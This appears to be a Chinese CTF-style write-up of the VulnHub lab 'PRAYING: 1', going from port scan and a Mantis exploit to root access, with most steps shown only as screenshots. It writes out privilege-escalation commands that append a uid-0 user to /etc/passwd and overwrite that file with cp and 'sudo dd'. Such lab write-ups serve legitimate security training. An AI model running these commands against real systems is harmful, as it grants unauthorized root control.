VulnHub靶场之PRAYING: 1

VulnHub靶场之PRAYING: 1

nmap扫描存活以及端口:
在这里插入图片描述
访问80端口,发现apache默认页面,扫描目录:
在这里插入图片描述
访问,发现是mantis登陆页面,查找相关漏洞:
在这里插入图片描述
直接使用脚本进行攻击,下载脚本,修改参数(途中换了个网络连接方式,所以IP与上面不同):
在这里插入图片描述
运行的得到shell:
在这里插入图片描述
在这里插入图片描述
查看用户:
在这里插入图片描述
没有权限进入用户目录,进行配置文件查找:
在这里插入图片描述
一个用户projman:
在这里插入图片描述
sudo -l查看权限:
在这里插入图片描述
可以看见有cp命令,尝试利用cp命令进行提权:

cat /etc/passwd >passwd
openssl passwd -1 -salt hack hack123
$1$hack$WTn0dk2QjNeKfl.DHOUue0
echo 'hack:$1$hack$WTn0dk2QjNeKfl.DHOUue0:0:0::/root/:/bin/bash' >> passwd
cp passwd /etc/passwd
su - hack

利用不成功,查找suid文件,发现没有cp,,,,
换方式,,,发现用户目录下存在.part1文件:
在这里插入图片描述
得到一个字符串,怀疑是某个用户的密码:
在这里插入图片描述
尝试登录,发现是用户elevate的密码,切换用户:
在这里插入图片描述
sudo -l查看权限:
在这里插入图片描述
利用dd命令进行提权,把root密码清空:

sudo dd if=/etc/passwd of=passwd

然后修改passwd文件:
在这里插入图片描述
之后:sudo dd if=1.txt of=/etc/passwd
在这里插入图片描述
拿到root权限:
在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值